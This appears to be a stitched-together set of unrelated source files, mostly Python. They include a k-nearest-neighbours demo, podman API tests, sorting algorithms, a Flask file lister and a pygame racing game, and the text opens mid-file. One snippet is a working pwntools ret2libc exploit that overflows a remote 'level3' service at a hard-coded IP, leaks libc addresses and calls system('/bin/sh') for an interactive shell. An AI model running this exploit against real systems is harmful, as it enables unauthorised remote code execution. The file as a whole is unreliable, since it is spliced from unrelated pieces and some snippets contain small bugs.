smallDoses=mlines.Line2D([],[],color='orange',marker='.',markersize=6,label='smallDoses')
largeDoses=mlines.Line2D([],[],color='red',marker='.',markersize=6,label='largeDoses')
#添加图例
axs[0][0].legend(handles=[didntLike,smallDoses,largeDoses])
axs[0][1].legend(handles=[didntLike,smallDoses,largeDoses])
axs[1][0].legend(handles=[didntLike,smallDoses,largeDoses])
#显示图片
plt.show()
"""
函数说明:对数据进行归一化
parameters:
dataSet:特征矩阵
Returns:
normDataSet:归一化后的特征矩阵
ranges:数据范围
minVals:数据最小值
"""
def autoNorm(dataSet):
#获得数据的最小值和最大值,min()无参,所有中的最小值,min(0)每列的最小值,min(1)每行的最小值
minVals=dataSet.min(0)
maxVals=dataSet.max(0)
#最大值和最小值的范围
ranges=maxVals-minVals
#shape(dataSet)返回dataSet的矩阵行列数
normDataSet=np.zeros(np.shape(dataSet))
#返回dataSet行数
m=dataSet.shape[0]
#原始值减去最小值
normDataSet=dataSet-np.tile(minVals, (m,1))
#除以最大和最小值的差,得到归一化数据
normDataSet=normDataSet/np.tile(ranges, (m,1))
#返回归一化数据结果,数据范围,最小值
return normDataSet,ranges,minVals
def datingClassTest():
datingDataMat,datingLabels=file2matrix("datingTestSet.txt")
#获取所有数据的百分之十
hoRatio=0.10
#数据归一化,返回归一化后的矩阵
normDataSet,ranges,minVals=autoNorm(datingDataMat)
#获取归一化后的矩阵行数
m=normDataSet.shape[0]
#测试数据
numTestVecs=int(m*hoRatio)
#出错数
errorCount=0.0
for i in range(numTestVecs):
#k-NN进行分类处理
classifierResult=classify0(normDataSet[i,:], normDataSet[numTestVecs:m,:], datingLabels[numTestVecs:m], 4)
print("分类结果:%d\t真是类别:%d"%(classifierResult,datingLabels[i]))
#错误数据统计
if classifierResult!=datingLabels[i]:
errorCount+=1.0
print("错误率:%f%%"%(errorCount/float(numTestVecs)*100))
if __name__=='__main__':
# datingDataMat,datingLabels=file2matrix("datingTestSet.txt")
# showdatas(datingDataMat, datingLabels)
# normDataSet,ranges,minVals=autoNorm(datingDataMat)
# print(normDataSet)
# print(ranges)
# print(minVals)
datingClassTest() |
class PersistenceConfiguration(JdbcConfiguration):
# @Bean
# NamedParameterJdbcOperations operations() {
# return new NamedParameterJdbcTemplate(dataSource());
# }
#
# @Bean
# PlatformTransactionManager transactionManager() {
# return new DataSourceTransactionManager(dataSource());
# }
@Bean
DataSource dataSource(){
return new EmbeddedDatabaseBuilder()
.setName( "obops" )
.setType( EmbeddedDatabaseType.HSQL )
.addScript( "rmq-message-broker-schema.sql" )
.build();
}
}
|
f = open("poker.txt", 'r')
rounds = f.read().split('\n')
cards = [a.split(' ') for a in rounds]
player1 = [c[0:5] for c in cards]
player2 = [c[5:10] for c in cards]
def cardsplit(card):
values = {'2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, 'T':10, 'J':11, 'Q':12, 'K':13, 'A':14}
suits = {'C': 0, 'D': 1, 'H': 2, 'S': 3}
return (values[card[0]], suits[card[1]])
for x in player1[0]:
print cardsplit(x) |
# import this
print("file works")
print("2 * 2 =", 2*2)
year = 2020
birthyear = 2000
month = "July"
print(month, year)
print("you are", year-birthyear)
my_float = 2.4
print(str(8) + str(int('7')))
num = 2
if num < 4:
print("smaller")
a_list = ["item1", "item2", 60]
b_list = [60, 62, 61]
a_map = {"key":"value", 6:"six"}
print("list:")
print(a_map["key"])
print(a_map[6])
b_list.sort() # or sorted(a_list)
print(a_list[:100])
print(a_list[100:])
print(a_list[-1])
print(60 in a_list)
for i in range(0, 4):
print(i);
|
import unittest
from varlink import (Client, VarlinkError)
address = "unix:/run/podman/io.projectatomic.podman"
client = Client(address=address)
def runErrorTest(tfunc):
try:
tfunc()
except VarlinkError as e:
return e.error() == "org.varlink.service.MethodNotImplemented"
return False
class ImagesAPI(unittest.TestCase):
def test_ListImages(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.ListImages))
def test_BuildImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.BuildImage))
def test_CreateImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.CreateImage))
def test_InspectImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.InspectImage))
def test_HistoryImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.HistoryImage))
def test_PushImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.PushImage))
def test_TagImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.TagImage))
def test_RemoveImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.TagImage))
def test_SearchImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.SearchImage))
def test_DeleteUnusedImages(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.DeleteUnusedImages))
def test_CreateFromContainer(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.CreateFromContainer))
def test_ImportImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.ImportImage))
def test_ExportImage(self):
podman = client.open("io.projectatomic.podman")
self.assertTrue(runErrorTest(podman.ExportImage))
if __name__ == '__main__':
unittest.main()
|
import os
import numpy as np
import glob
import echo_canc_lib as ec
label = 'us/'
path_label = "./data/" + label + "label/"
path_mfcc = "./data/" + label + "feature/"
path_feature = "./data/" + label + "feature/final/"
left_context = 3
right_context = 3
feature_train = np.empty((0, 39*(left_context + right_context + 1)))
feature_test = np.empty((0, 39*(left_context + right_context + 1)))
label_train = np.empty((0, 1))
label_test = np.empty((0, 1))
id_test = np.empty((0, 1))
filename_test = []
print(path_label + label[0:-1] + '_refined')
with open(path_label + label[0:-1] + '_refined') as f:
k = 1
prev_file = '__'
prev_label = []
prev_feat = []
for line in f:
if np.mod(k, 10) == 0:
test = 1
train = 0
else:
test = 0
train = 1
line_split = line.split(',')
filename = line_split[0]
start_frame = {}
end_frame = {}
m = 1
for j in range(int(len(line_split)/2 - 1)):
if line_split[m] == 'us':
start_frame[j] = line_split[m + 1]
end_frame[j] = line_split[m + 2]
m += 3
total_frame = line_split[-1]
with open(path_mfcc + filename, 'r') as f:
lines = f.readlines()
rows = [line.split() for line in lines]
rows = np.asarray(rows)
mfcc_ = rows.astype(np.float)
num_data, num_feat = np.shape(mfcc_)
num_data = int(num_data)
total_frame = int(total_frame)
if num_data != total_frame:
total_frame = num_data
if num_data != total_frame:
print('something is wrong!!!')
break
if len(start_frame) == 0:
continue
else:
print('processing: ', filename, '...')
k += 1
feature_temp = ec.get_feature_new(mfcc_, left_context, right_context)
label_temp = ec.get_label_new(start_frame, end_frame, total_frame, left_context, right_context)
if train:
feature_train = np.concatenate((feature_train, feature_temp), axis=0)
label_train = np.concatenate((label_train, label_temp), axis=0)
elif test:
feature_test = np.concatenate((feature_test, feature_temp), axis=0)
label_test = np.concatenate((label_test, label_temp), axis=0)
id_test_temp = np.zeros((num_data, 1))
id_test_temp = id_test_temp[4:-3]
id_test_temp[0] = 1
id_test_temp[-1] = -1
id_test = np.concatenate((id_test, id_test_temp), axis=0)
filename_test = np.append(filename_test, filename)
if k > 2000:
break
if not os.path.exists(path_feature):
os.makedirs(path_feature)
np.savez(path_feature + label[0:-1] + '.npz', feature_train=feature_train, label_train=label_train,
feature_test=feature_test, label_test=label_test, id_test=id_test,
filename_test=filename_test)
idx_0 = np.where(label_train == 0)[0]
idx_1 = np.where(label_train == 1)[0]
print('filler:', len(idx_0))
print('keyword:', len(idx_1))
idx_0 = np.where(label_test == 0)[0]
idx_1 = np.where(label_test == 1)[0]
print('filler t:', len(idx_0))
print('keyword t:', len(idx_1))
|
from pwn import *
#p=process("./level3")
p=remote('111.200.241.244',48932)
elf=ELF("./level3")
libc=ELF('./libc_32.so.6')
sys_r_write=libc.sym['write']-libc.sym['system']
bash_r_write=libc.sym['write']-0x0015902b
payload='a'*0x8c+p32(elf.plt['write'])+p32(elf.sym['main'])+p32(1)+p32(elf.got['write'])+p32(10)
p.sendlineafter("Input:\n",payload)
a_write=u32(p.recv()[:4])
a_sys=a_write-sys_r_write
a_bash=a_write-bash_r_write
payload2='a'*0x8c+p32(a_sys)+'a'*4+p32(a_bash)
p.sendlineafter("Input:\n",payload2)
p.interactive()
|
from django.db import models
# 类: DailyMemo
class DailyMemo(models.Model):
date = models.DateField(verbose_name='日期')
time = models.TimeField(verbose_name='时间')
title = models.CharField(verbose_name='标题', max_length=100)
content = models.TextField(verbose_name='内容')
value = models.IntegerField(verbose_name='价值')
# END
|
from walrus_system_configuration.util import *
from catkin.find_in_workspaces import find_in_workspaces
import os
UDEV_RULES_DIR = '/etc/udev/rules.d'
def enumerate_udev_files():
udev_path_list = find_in_workspaces(project='walrus_system_configuration', path='udev', first_matching_workspace_only=True)
if len(udev_path_list) == 0:
error('Could not locate walrus udev rules to install')
return
udev_path = udev_path_list[0]
udev_files= [os.path.join(udev_path, f) for f in os.listdir(udev_path)]
epos_udev_file_list = find_in_workspaces(project='epos_hardware', path='90-ftd2xx.rules', first_matching_workspace_only=True)
if len(epos_udev_file_list) == 0:
error('Could not locate epos udev rules to install')
return
udev_files.append(epos_udev_file_list[0])
return udev_files
def install():
log('Installing udev rules')
for f in enumerate_udev_files():
name = os.path.basename(f)
installed_udev_file = os.path.join(UDEV_RULES_DIR, name)
if os.path.isfile(installed_udev_file):
if os.path.realpath(installed_udev_file) != f:
error(name + ' already exists, but is not correct')
if confirm('Backup old file and install ' + name):
sudo_mv(installed_udev_file, installed_udev_file+'~')
sudo_symlink(f, installed_udev_file)
else:
success(name + ' already installed')
else:
warn(name + ' does not exist')
if confirm('Install ' + name + '?'):
log('Installing: ' + name)
sudo_symlink(f, installed_udev_file)
def status():
log('udev rules')
udev_path_list = find_in_workspaces(project='walrus_system_configuration', path='udev', first_matching_workspace_only=True)
if len(udev_path_list) == 0:
error('Could not locate udev rules')
return
udev_path = udev_path_list[0]
udev_file_names = os.listdir(udev_path)
for f in enumerate_udev_files():
name = os.path.basename(f)
installed_udev_file = os.path.join(UDEV_RULES_DIR, name)
if os.path.isfile(installed_udev_file):
if os.path.realpath(installed_udev_file) != f:
warn(name + ' exists, but is not correct')
else:
success(name + ' installed')
else:
error(name + ' not installed')
|
import os
import os.path
from flask import Flask
from flask_autoindex import AutoIndex
class cdn :
app = Flask(__name__)
AutoIndex(app, browse_root=os.path.curdir)
@app.route('/list')
def list():
r=[]
f=[os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(os.getcwd())
for f in files]
for i in range(-1,len(f)-1) :
s=str(f[i]).replace(str(os.getcwd()),'')
s=s.replace('\\','/')
r.append(s[1:len(s)])
return str(r)
if __name__ == '__main__':
cdn.app.run()
|
def isPalindrome(self, array: List[int]) -> bool:
middle_value = len(array) // 2
array_length = len(array)
for i in range(middle_value + 1):
if array[i] != array[array_length - i - 1]:
return False
return True
|
# -*- encoding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import io
import logging
import logging.config
import sys
from collections import OrderedDict
from armory.environ import Environment
from armory.serialize import jsonexpand, jsonify
from dateutil.parser import parse
from .comm import CommProxy
if (sys.version_info > (3, 0)):
# FileNotFoundError is a built-in for Python 3
pass
else:
FileNotFoundError = (IOError, OSError)
LOGGING_VERBOSITY_DEFAULT = 'levelname'
LOGGING_LEVEL_DEFAULT = 'INFO'
LOGGING_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(message)s',
},
'levelname': {
'format': '[%(levelname)s] %(message)s',
},
'normal': {
'format': '[%(levelname)s] %(name)s:%(lineno)d %(message)s',
},
'verbose': {
'format': (
'[%(levelname)s] %(name)s:%(funcName)s:%(lineno)d %(message)s'
),
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'stream': sys.stdout,
'formatter': LOGGING_VERBOSITY_DEFAULT,
},
},
'loggers': {
'': {
'level': LOGGING_LEVEL_DEFAULT,
'handlers': ['console'],
'propagate': False,
},
'dragonite': {
'level': LOGGING_LEVEL_DEFAULT,
'handlers': ['console'],
'propagate': False,
},
'requests': {
'level': 'WARNING',
'handlers': ['console'],
'propagate': False,
}
},
}
class DragoniteCache(object):
def __init__(self, tofile=False, cachefile=None):
self._data = {}
self._tofile = tofile
self.cachefile = cachefile or '.dragonite'
try:
with io.open(self.cachefile, 'r', encoding='utf-8') as cf:
raw = cf.read()
if raw:
self._data.update(jsonexpand(raw))
if 'event_start' in self._data:
self._data['event_start'] = parse(self._data['event_start'])
if 'event_end' in self._data:
self._data['event_end'] = parse(self._data['event_end'])
except FileNotFoundError:
pass
def __getitem__(self, item):
return self._data[item]
def __setitem__(self, item, value):
self._data[item] = value
def get(self, item, default=None):
return self._data.get(item, default)
def flush(self):
if not self._tofile:
return
with io.open(self.cachefile, 'w', encoding='utf-8') as cf:
cf.write(jsonify(self._data, True))
class DragoniteConfig(object):
fmt_long = '[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s'
fmt_short = '%(message)s'
fmt_date = '%Y-%m-%d %H:%M:%S'
MAX_PRICE = 300
def __init__(self, **options):
if options:
self.setup(**options)
def configure(self, **options):
self._warnings = []
self._logconf = {}
self.env = Environment({
'DRAGONITE_LOGLEVEL': {'default': 'info'},
})
ll = options.get('loglevel', None)
if ll is None:
try:
self.loglevel = self.env('DRAGONITE_LOGLEVEL').upper()
except KeyError:
errmsg = 'ignoring env var {0} with invalid value of {1}'
self._warnings.append(errmsg.format('DRAGONITE_LOGLEVEL', ll))
self.loglevel = 'INFO'
else:
try:
self.loglevel = ll.upper()
except KeyError:
errmsg = 'ignoring option loglevel with invalid value of {0}'
self._warnings.append(errmsg.format(ll))
self.loglevel = 'INFO'
LOGGING_CONFIG['loggers']['']['level'] = self.loglevel
LOGGING_CONFIG['loggers']['dragonite']['level'] = self.loglevel
self.verbose = bool(options.get('verbose', False))
if self.verbose:
LOGGING_CONFIG['handlers']['console']['formatter'] = 'normal'
logging.config.dictConfig(LOGGING_CONFIG)
cc = options.get('cache', None)
if cc is None:
self.use_cache = False
else:
self.use_cache = bool(cc)
self.interval = 1
self.max_attempts = options.get('max_attempts', 0)
self.debug = options.get('debug', False)
self.info = options.get('info', True)
self.simple = options.get('simple', False)
self.nodb = options.get('nodb', False)
self.comm = CommProxy(settings=self)
@property
def cache(self):
if not hasattr(self, '_cache'):
self._cache = DragoniteCache(tofile=self.use_cache)
return self._cache
def __str__(self):
return '{0}'.format({
'use_cache': self.use_cache,
})
@property
def sms_enabled(self):
return self.cache.get('send_sms', False)
@property
def email_enabled(self):
return self.cache.get('send_email', False)
@property
def max_price(self):
return self.cache.get('max_price', self.MAX_PRICE)
@property
def checkin(self):
return self.cache.get('checkin', None)
@property
def checkout(self):
return self.cache.get('checkout', None)
@property
def use_db(self):
return (not self.nodb)
def dict(self):
config = OrderedDict()
config['debug'] = self.debug
config['info'] = self.info
config['simple'] = self.simple
config['use_cache'] = self.use_cache
config['use_db'] = self.use_db
config['max_attempts'] = self.max_attempts
config['max_price'] = self.max_price
config['checkin'] = self.checkin
config['checkout'] = self.checkout
config['loglevel'] = self.loglevel
config['verbose'] = self.verbose
config['sms_enabled'] = self.sms_enabled
config['email_enabled'] = self.email_enabled
return config
def dumps(self, pretty=False):
return jsonify(self.dict(), pretty=pretty)
settings = DragoniteConfig()
|
# https://codeforces.com/group/XWOeQO4RLM/contest/206799/problem/G
studens=int(input())
abilities=input()
abilities=abilities[::2]
abilities=list(abilities)
for i in range(len(abilities)):
abilities[i]=int(abilities[i])
comands=[]
diff = 1
while abilities!=[]:
for i in abilities:
print(111)
if len(comands)<4:
comands.append(i)
comands.append('index = '+str(abilities.index(i)+diff)+' , ')
abilities.remove(i)
diff+=1
print(222)
elif i!=comands[-2] and i!=comands[-4]:
comands.append(i)
comands.append('index = '+str(abilities.index(i)+diff)+' , ')
abilities.remove(i)
diff+=1
print(333)
print(' comands ')
print(*comands) |
from bokeh.core.properties import Override, List, String
from bokeh.models import CompositeTicker, AdaptiveTicker, TickFormatter, LinearAxis
# Globals
ONE_NANO = 1e-9
ONE_MILLI = 1e-3
ONE_SECOND = 1.0
ONE_MINUTE = 60.0 * ONE_SECOND
ONE_HOUR = 60 * ONE_MINUTE
def _TIME_TICK_FORMATTER_HELP(field):
return """
Formats for displaying time values in the %s range.
See the :class:`~bokeh.models.formatters.TimeTickFormatter` help for a list of all supported formats.
""" % field
class TimeTicker(CompositeTicker):
""" Generate nice ticks across different time scales.
"""
__implementation__ = 'time_ticker.coffee'
num_minor_ticks = Override(default=4)
tickers = Override(default=lambda: [
AdaptiveTicker(
mantissas=[1, 2, 5],
base=10,
min_interval=ONE_NANO,
max_interval=500 * ONE_MILLI,
num_minor_ticks=5
),
AdaptiveTicker(
mantissas=[1, 2, 5, 10, 15, 20, 30],
base=60,
min_interval=ONE_SECOND,
max_interval=30 * ONE_MINUTE,
num_minor_ticks=4
),
AdaptiveTicker(
mantissas=[1, 2, 4, 6, 8, 12],
base=24,
min_interval=ONE_HOUR,
max_interval=None,
num_minor_ticks=4
)
])
class TimeTickFormatter(TickFormatter):
""" A ``TickFormatter`` for displaying time values nicely across a
range of scales.
``TimeTickFormatter`` has the following properties for setting formats
at different time scales:
* ``nanoseconds``
* ``micronanosec``
* ``microseconds``
* ``millimicrosec``
* ``milliseconds``
* ``secmillisec``
* ``seconds``
* ``minsec``
* ``minutes``
* ``hourmin``
* ``hours``
Each scale property can be set to format or list of formats to use for
formatting time tick values that fall in in that "time scale".
By default, only the first format string passed for each time scale
will be used. By default, all leading zeros are stripped away from
the formatted labels.
"""
__implementation__ = 'time_tick_formatter.coffee'
nanoseconds = List(
String,
default=['ns'],
help=_TIME_TICK_FORMATTER_HELP("``nanoseconds``")
).accepts(String, lambda fmt: [fmt])
micronanosec = List(
String,
default=['us'],
help=_TIME_TICK_FORMATTER_HELP("``micronanosec`` (for combined microseconds and nanoseconds)")
).accepts(String, lambda fmt: [fmt])
microseconds = List(
String,
default=['us'],
help=_TIME_TICK_FORMATTER_HELP("``microseconds``")
).accepts(String, lambda fmt: [fmt])
millimicrosec = List(
String,
default=['ms'],
help=_TIME_TICK_FORMATTER_HELP("``millimicrosec`` (for combined milliseconds and microseconds)")
).accepts(String, lambda fmt: [fmt])
milliseconds = List(
String,
default=['ms'],
help=_TIME_TICK_FORMATTER_HELP("``milliseconds``")
).accepts(String, lambda fmt: [fmt])
secmillisec = List(
String,
default=['s'],
help=_TIME_TICK_FORMATTER_HELP("``secmillisec`` (for combined seconds and milliseconds)")
).accepts(String, lambda fmt: [fmt])
seconds = List(
String,
default=['s'],
help=_TIME_TICK_FORMATTER_HELP("``seconds``")
).accepts(String, lambda fmt: [fmt])
minsec = List(
String,
default=['%Mm%Ss', ':%M:%S'],
help=_TIME_TICK_FORMATTER_HELP("``minsec`` (for combined minutes and seconds)")
).accepts(String, lambda fmt: [fmt])
minutes = List(
String,
default=['%Mm', ':%M'],
help=_TIME_TICK_FORMATTER_HELP("``minutes``")
).accepts(String, lambda fmt: [fmt])
hourmin = List(
String,
default=['%Hh%Mm', '%H:%M'],
help=_TIME_TICK_FORMATTER_HELP("``hourmin`` (for combined hours and minutes)")
).accepts(String, lambda fmt: [fmt])
hours = List(
String,
default=['%Hh'],
help=_TIME_TICK_FORMATTER_HELP("``hours``")
).accepts(String, lambda fmt: [fmt])
class TimeAxis(LinearAxis):
""" An LinearAxis that picks nice numbers for tick locations on a
time scale. Configured with a ``TimeTickFormatter`` by default.
"""
__implementation__ = 'time_axis.coffee'
ticker = Override(default=lambda: TimeTicker())
formatter = Override(default=lambda: TimeTickFormatter())
|
from parsing.parser import *
from actions.question import *
from parsing.parse_interaction import interactable_object_name, guard_noun
def see_verb() -> Parser:
"""
:return: a parser for words that mean 'to see'. This only consumes the parsed words.
"""
can_see = maybe(word_match('can', consume=Consume.WORD_ONLY)).ignore_then(word_meaning('see', consume=Consume.WORD_ONLY))
near = word_meaning('near', consume=Consume.WORD_ONLY)
look = word_spelling('look', match_first_letter=True, consume=Consume.WORD_ONLY)
find = word_spelling('find', consume=Consume.WORD_ONLY)
return strongest([can_see, near, look, find])
def inventory_question() -> Parser:
"""
:return: a parser for asking the spy what they're holding.
"""
what = strongest_word(['what'], make_word_parsers=[word_spelling, word_meaning])
you = word_match('you')
carrying = strongest_word(['hold', 'carry', 'doing'], make_word_parsers=[word_spelling, word_meaning])
return maybe(what) \
.ignore_then(you, mix) \
.ignore_then(carrying, lambda what_r, carry_r: mix(what_r, carry_r, 0.24)) \
.ignore_parsed(InventoryContentsQuestion())
def location_question() -> Parser:
"""
:return: a parser for asking the spy where they are.
"""
spelling = partial(word_spelling, match_first_letter=True)
where = strongest_word(['where'], make_word_parsers=[spelling, word_meaning])
you = strongest_word(['you', 'i'])
return where.ignore_then(you, lambda r1, r2: mix(r1, r2, 0.1)).ignore_parsed(LocationQuestion())
def guards_question() -> Parser:
"""
:return: a parser for asking questions about guards.
"""
return see_verb() \
.ignore_then(guard_noun(), mix) \
.ignore_parsed(GuardsQuestion())
def surroundings_question() -> Parser:
"""
:return: a parser for asking questions about what the spy can see around them.
"""
# E.g. what's can you see?
what = strongest_word(['what'], make_word_parsers=[word_spelling, word_meaning])
what_around = maybe(what) \
.ignore_then(see_verb(), combine_responses=mix)
# E.g. what's in the room
room = strongest_word(['room', 'corridor'], make_word_parsers=[word_spelling])
what_in = maybe(what) \
.ignore_then(room, combine_responses=mix)
return strongest([what_around, what_in]) \
.ignore_parsed(SurroundingsQuestion())
def see_object_question() -> Parser:
"""
:return: a parser for asking whether the spy can see a specific object.
"""
there = strongest_word(['there', 'where']) # E.g. "are there any ... ?" or "where are the ...?"
verb = strongest([see_verb(), there])
return verb \
.ignore_then(interactable_object_name(), mix) \
.map_parsed(lambda obj: SeeObjectQuestion(obj))
def question() -> Parser:
"""
:return: a parser for all the types of question.
"""
parsers = [
inventory_question(),
see_object_question(),
location_question(),
guards_question(),
surroundings_question()
]
return strongest(parsers)
|
from util.search_equ import search_by_token, search_by_id
from util.alter_label_text import alter_label
data_list = search_by_token("\prime", mode=0)
#data_list2 = search_by_token("'", mode= 0)
# check if prime following "^"
def get_all_index_of_a_token(token_list, token):
index_list = []
for i in range(len(token_list)):
if token_list[i] == token:
index_list.append(i)
return index_list
def following_caret(token_list, token_index):
if token_list[token_index-1] == "^":
return True
f = []
for i in data_list:
tokens, labels = search_by_id(i)
index_list = get_all_index_of_a_token(tokens, "\prime")
for j in index_list:
if following_caret(tokens, j):
f.append(i)
break
pass
|
import os
from dotenv import load_dotenv
from app import create_app
dotenv_path = os.path.join(os.path.dirname(__file__), '.env')
if os.path.exists(dotenv_path):
load_dotenv(dotenv_path)
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
from flask_migrate import migrate, upgrade
from app import models
from tests.populate_db import populate_user_table, populate_movie_table
@app.shell_context_processor
def make_shell_context():
return dict(db=models.db, models=models)
@app.cli.command()
def deploy():
migrate()
upgrade()
populate_user_table(app)
populate_movie_table(app)
|
x = True
y = False
if x or y:
print("Dio bien")
print("fskjdgh")
else:
print("Dio mal")
print("ok")
print("123")
|
# Built-in modules #
# Internal modules #
import illumitag
from illumitag.groups.aggregate import Collection, Aggregate
from illumitag.common.autopaths import AutoPaths
# Third party modules #
###############################################################################
class Projects(Collection):
"""A collection of projects."""
pass
###############################################################################
class Project(Aggregate):
"""A project containing several pools possibly spanning several runs."""
def __repr__(self): return '<%s object "%s" with %i pools>' % \
(self.__class__.__name__, self.name, len(self))
@property
def long_name(self): return self.first.project_long_name
def __init__(self, name, pools, projs_dir):
# Attributes #
self.name = name
self.pools, self.children = pools, pools
self.loaded = False
# Dir #
self.base_dir = projs_dir + self.name + '/'
self.p = AutoPaths(self.base_dir, self.all_paths)
# Extra #
self.meta_data_path = illumitag.repos_dir + 'projects/' + self.name + '.csv' |
import random
def random_list(n, max_int=1000000):
return [random.randrange(max_int) for _ in range(n)]
# ===================== O(n^2) algorithms =====================
def bubble_sort(lst):
for i in range(len(lst)):
for j in range(len(lst) - i - 1):
if(lst[j] > lst[j+1]):
lst[j], lst[j+1] = lst[j+1], lst[j]
def selection_sort(lst):
for i in range(len(lst)):
min_j = i
for j in range(i + 1, len(lst)):
if lst[j] < lst[min_j]:
min_j = j
lst[i], lst[min_j] = lst[min_j], lst[i]
def insertion_sort(lst):
for i in range(1, len(lst)):
val, j = lst[i], i
while j > 0 and lst[j - 1] > val:
lst[j] = lst[j - 1]
j -= 1
lst[j] = val
# =================== O(N log N) algorithms ===================
def heapsort(lst):
def heapify(lst):
for start in reversed(range(len(lst))):
sink(lst, start, len(lst) - 1)
def sink(lst, start, end):
current = start
while current * 2 + 1 <= end:
left = current * 2 + 1
right = current * 2 + 2
largest = current
if lst[largest] < lst[left]:
largest = left
if right <= end and lst[largest] < lst[right]:
largest = right
if largest == current:
return
else:
lst[current], lst[largest] = lst[largest], lst[current]
current = largest
heapify(lst)
for i in reversed(range(len(lst))):
lst[i], lst[0] = lst[0], lst[i]
sink(lst, 0, i - 1)
def merge_sort(lst):
if len(lst) > 1:
mid = len(lst) // 2
left, right = lst[:mid], lst[mid:]
merge_sort(left)
merge_sort(right)
i, j, k = 0, 0, 0
while i < len(left) and j < len(right):
if left[i] <= right[j]:
lst[k] = left[i]
i += 1
else:
lst[k] = right[j]
j += 1
k += 1
while i < len(left):
lst[k] = left[i]
i += 1
k += 1
while j < len(right):
lst[k] = right[j]
j += 1
k += 1
def quicksort(lst, begin=0, end=None):
def partition(lst, begin, end):
pivot = begin
for i in range(begin + 1, end + 1):
if lst[i] <= lst[begin]:
pivot += 1
lst[i], lst[pivot] = lst[pivot], lst[i]
lst[pivot], lst[begin] = lst[begin], lst[pivot]
return pivot
if end is None:
end = len(lst) - 1
if begin >= end:
return
pivot = partition(lst, begin, end)
quicksort(lst, begin, pivot - 1)
quicksort(lst, pivot + 1, end)
# lst = random_list(100, 1000)
# print(lst)
# heapsort(lst)
# print(lst)
|
# Write a Python program to get next day of a given date.
# Expected Output:
# Input a year: 2016
# Input a month [1-12]: 08
# Input a day [1-31]: 23
# The next date is [yyyy-mm-dd] 2016-8-24
date=int(input("enter the date:"))
if date>=1 and date<=31:
print("now enter the month")
month=int(input("enter the month:"))
if month>=1 and month<=12:
print("plz enter the year now")
year=int(input("enter the year:"))
if year>=0 and year<=2021:
print(date+1,"/",month,"/",year)
else:
print("plz enter valid year")
else:
print("plz enter the valid month")
else:
print("plz enter valid date")
|
# -*- coding: utf-8 -*-
import pygame
import random
import time
from random import choice
from firebase import firebase
from tkinter import *
import sys
import tkinter as tk
FIREBASE_URL = "https://car-game.firebaseio.com/"
global result
if __name__ == '__main__':
# Cria uma referência para a aplicação Firebase
fb = firebase.FirebaseApplication(FIREBASE_URL, None)
# Lê o dado da base de dados
result = fb.get('/', "Scores")
#nome = input("Insira o seu nome: ")
escolha_Carro = 1 # 1 for Ferrari 2 for Mini
produto = result
pygame.init()
pygame.display.set_caption('Teachers Game Race') #Nome do jogo a ser decidido
framespersecond = pygame.time.Clock()
black = (0,0,0)
white = (255,255,255)
blue = (0,0,255)
green = (0,255,0)
red = (255,0,0)
blackb = (200,200,200)
yellow = (255,242,0)
grey = (69,69,69)
largura_da_tela = 800 #eixox
altura_da_tela = 600
smallfont = pygame.font.SysFont("comicsansms", 30)
medfont = pygame.font.SysFont("comicsansms", 40)
largefont = pygame.font.SysFont("comicsansms", 110)
gameDisplay = pygame.display.set_mode((largura_da_tela,altura_da_tela))
fps = 1000
img_mini = pygame.image.load('car8bits2.png')
img_ferrari = pygame.image.load('ferraricar.png')
img_delorean = pygame.image.load('delorean.png')
img_speed = pygame.image.load('speedracer.png')
imgcarro = img_mini
lourenco = pygame.image.load('lor.png')
miranda = pygame.image.load('mir.png')
orfali = pygame.image.load('orf.png')
fred5 = pygame.image.load('fred1.png')
haddad = pygame.image.load('had.png')
heloisa = pygame.image.load('helo2.png')
vinicius = pygame.image.load('vinicius1.png')
bala = pygame.image.load("bala.png")
cubo = pygame.image.load("ItemBox.png")
Mini2 = pygame.image.load('mini.png')
Mini = pygame.image.load('mini2.png')
Ferrari2 = pygame.image.load('Ferrari.png')
Ferrari = pygame.image.load('Ferrari2.png')
fundo = pygame.image.load('Fundo1.png')
space = pygame.image.load('space.png')
arrow = pygame.image.load('arrow.png')
Delorean = pygame.image.load('deloreann.png')
Delorean2 = pygame.image.load('deloreannpb.png')
Speed = pygame.image.load('speedracerr.png')
Speed2 = pygame.image.load('speedracerrpb.png')
helopeq = pygame.image.load('helopeq.png')
orfpeq = pygame.image.load('orfpeq.png')
fredpeq = pygame.image.load('fredpeq.png')
mirpeq = pygame.image.load('mirpeq.png')
lorpeq = pygame.image.load('lorpeq.png')
bruno = pygame.image.load('bruno.png')
bruno2 = pygame.image.load('bruno2.png')
calvin = pygame.image.load('calvin.png')
calvin2 = pygame.image.load('calvin2.png')
brinquedo = pygame.image.load('brinquedo.png')
brinquedo2 = pygame.image.load('brinquedo2.png')
garrix = pygame.image.load('garrix.png')
garrix2 = pygame.image.load('garrix2.png')
katy = pygame.image.load('katy.png')
katy2 = pygame.image.load('katy2.png')
acdc = pygame.image.load('acdc.png')
acdc2 = pygame.image.load('acdc2.png')
deserto = pygame.image.load('deserto.png')
virus = pygame.mixer.Sound('virus.wav')
firework = pygame.mixer.Sound('katy.wav')
thunder = pygame.mixer.Sound('thunderstruck.wav')
uptown = pygame.mixer.Sound('uptown8bits.wav')
bottle = pygame.mixer.Sound('DrinkingFromTheBottle.wav')
